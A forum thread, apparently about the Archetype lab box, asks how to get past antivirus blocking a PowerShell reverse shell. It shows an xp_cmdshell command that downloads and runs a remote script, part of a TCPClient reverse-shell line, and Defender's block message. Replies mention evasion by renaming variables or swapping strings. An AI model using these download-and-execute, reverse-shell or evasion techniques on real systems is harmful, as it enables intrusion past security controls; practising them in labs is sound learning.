ARCHETYPE Antivirus Blocking Reverse Shell

I have rooted the box, but not without first running into a situation where antivirus blocked the PowerShell one-liner I initially chose for the reverse shell (the PowerShell reverse shell one-liner by Nikhil "SamratAshok" Mittal, @samratashok on GitHub). My one-liner looked very similar to the one in the walkthrough (which I eventually used successfully).

Just curious if anyone ran into the same thing and how you got past this roadblock. I tried tweaking the variable names in my script, and also tried generating completely different payloads through msfvenom, but had no success.

I’m also not sure why a box that could require antivirus evasion is marked as an easy box.

1> xp_cmdshell "powershell IEX (New-Object System.Net.WebClient).DownloadString('');"
2> go
output: IEX : At line:1 char:1
output: + $c = New-Object System.Net.Sockets.TCPClient("",443);$s = ...
output: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
output: This script contains malicious content and has been blocked by your antivirus software.
output: At line:1 char:1
output: + IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.14
output: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
output: + CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
output: + FullyQualifiedErrorId : ScriptContainedMaliciousContent,Microsoft.PowerShell.Commands.InvokeExpressionCommand
output: NULL

I happened to have the same issue. If I removed the


in the script and replaced it with


then it works.

It is weird that the original script worked for some days, and then the next day when I tried it, it stopped working.

Same here: yesterday the shell worked, today it doesn't... very confusing...